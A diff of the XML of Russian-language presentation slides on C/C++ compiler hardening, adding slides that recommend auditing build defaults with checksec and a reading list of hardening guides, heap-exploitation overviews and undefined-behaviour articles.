-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8E47BF-47BB-42B9-B025-B0A5D6833D5D}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{527B94E6-AC75-496A-80B4-C52365ABC84D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -30312,18 +34413,21 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Приложения</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Что стоит сделать </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="Text Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448D2064-70B6-47CB-BA79-87C67150F18F}"/>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861B54C4-30F2-41AC-AD28-53F5FBB73FC4}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -30331,7 +34435,7 @@
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph type="body" idx="1"/>
+            <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr/>
@@ -30339,7 +34443,106 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr lang="en-US"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверить дефолтные опции при сборке продуктового кода и дистрибутива</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Решить с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Security Team </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>какие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardening</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>-методы включить</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Поиск проблемных программ (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>no-pie, etc.) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>можно автоматизировать с помощью </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>утилиты </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>checksec</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Может проверить наличие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>noexecstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, PIE, _FORTIFY_SOURCE, RELRO, etc.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пока </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(?) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не поддерживает более новые защиты</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: CFI (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>все виды</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>), Stack Clashing, Safe Stack, etc.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -30348,7 +34551,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF2943A-E379-4742-8C1A-0BAC9F109FE2}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD9F63E-EF6A-418A-B986-AFC03C54C97A}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -30375,7 +34578,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2401149323"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1359780015"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -30730,6 +34933,523 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE0E5C5-D212-445A-B152-EE70980D9FFC}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Что почитать </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947FFF96-69F7-4C4A-8AAB-7A04BDA9C83C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Примеры атак</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Nightmare</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Overview of GLIBC heap exploitation techniques</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Руководства по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardening</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>OpenSSF</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t> Compiler Options Hardening Guide for C and C++</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>Linux Hardening Guide</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Статьи </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>John </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Regehr</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>про </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>UB</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId6"/>
+              </a:rPr>
+              <a:t>A Guide to Undefined Behavior in C and C++</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId7"/>
+              </a:rPr>
+              <a:t>UB in 2017</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F156ECC1-89ED-435D-9383-51CEED6C2D15}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>90</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3985882342"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide91.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Спасибо за внимание !</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Полная версия слайдов доступна по адресу</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/RU.pptx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Вопросы</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC4F7E3-DA50-4105-92F5-2DAFFC744B19}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4048685" y="2932580"/>
+            <a:ext cx="2857500" cy="2857500"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A51005D-9E17-47C5-BDBD-99FFE4265CB4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>91</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide92.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8E47BF-47BB-42B9-B025-B0A5D6833D5D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Приложения</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Text Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448D2064-70B6-47CB-BA79-87C67150F18F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF2943A-E379-4742-8C1A-0BAC9F109FE2}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>92</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2401149323"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide93.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
               </a:ext>
             </a:extLst>
@@ -30975,7 +35695,7 @@
           <a:p>
             <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>90</a:t>
+              <a:t>93</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -289,7 +289,7 @@
           <a:p>
             <a:fld id="{A8F27B54-EFD4-4F1F-9CE4-9A3C368187A4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/19/2025</a:t>
+              <a:t>7/20/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -703,7 +703,7 @@
           <a:p>
             <a:fld id="{4E570717-CC08-42AC-84F3-7EB74EE2C2EE}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/19/2025</a:t>
+              <a:t>7/20/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -901,7 +901,7 @@
           <a:p>
             <a:fld id="{E850434B-ABC0-4013-A159-517880C2CE4B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/19/2025</a:t>
+              <a:t>7/20/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1109,7 +1109,7 @@
           <a:p>
             <a:fld id="{307E2251-42B8-4CD0-9F76-CE8A218C5A9B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/19/2025</a:t>
+              <a:t>7/20/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1307,7 +1307,7 @@
           <a:p>
             <a:fld id="{650366BD-2959-43A5-9C43-B178997CA9C1}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/19/2025</a:t>
+              <a:t>7/20/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1582,7 +1582,7 @@
           <a:p>
             <a:fld id="{44A443A2-278A-4AA2-A6FA-B813D9AB289B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/19/2025</a:t>
+              <a:t>7/20/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1847,7 +1847,7 @@
           <a:p>
             <a:fld id="{8DB96CD0-8DC9-4D9E-8F97-A64EB549E498}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/19/2025</a:t>
+              <a:t>7/20/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2259,7 +2259,7 @@
           <a:p>
             <a:fld id="{8728ABDD-F7C0-49E5-BDEF-78EEAB9D4FF0}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/19/2025</a:t>
+              <a:t>7/20/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2400,7 +2400,7 @@
           <a:p>
             <a:fld id="{1815E602-B233-4072-AF5E-EEC16D6A3250}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/19/2025</a:t>
+              <a:t>7/20/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2513,7 +2513,7 @@
           <a:p>
             <a:fld id="{B46368E2-0F8E-43F1-B205-4CE4ED81C818}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/19/2025</a:t>
+              <a:t>7/20/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2824,7 +2824,7 @@
           <a:p>
             <a:fld id="{A90826D4-3247-4C35-B745-95D9A6527E86}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/19/2025</a:t>
+              <a:t>7/20/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3112,7 +3112,7 @@
           <a:p>
             <a:fld id="{F697CA6C-CB8E-4E4E-A40B-CF748107F47F}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/19/2025</a:t>
+              <a:t>7/20/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3353,7 +3353,7 @@
           <a:p>
             <a:fld id="{486D2D92-9836-4BF5-99A8-6BBA488E0F07}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>7/19/2025</a:t>
+              <a:t>7/20/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -4265,21 +4265,6 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Накладые расходы</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>отсутствуют</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>Требуется чтобы весь код программы был собран в режиме неисполняемого стека</a:t>
             </a:r>
           </a:p>
@@ -4378,6 +4363,21 @@
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>GNU nested functions</a:t>
             </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Накладые расходы</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>отсутствуют</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
@@ -5508,6 +5508,46 @@
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>скомпрометирована</a:t>
             </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
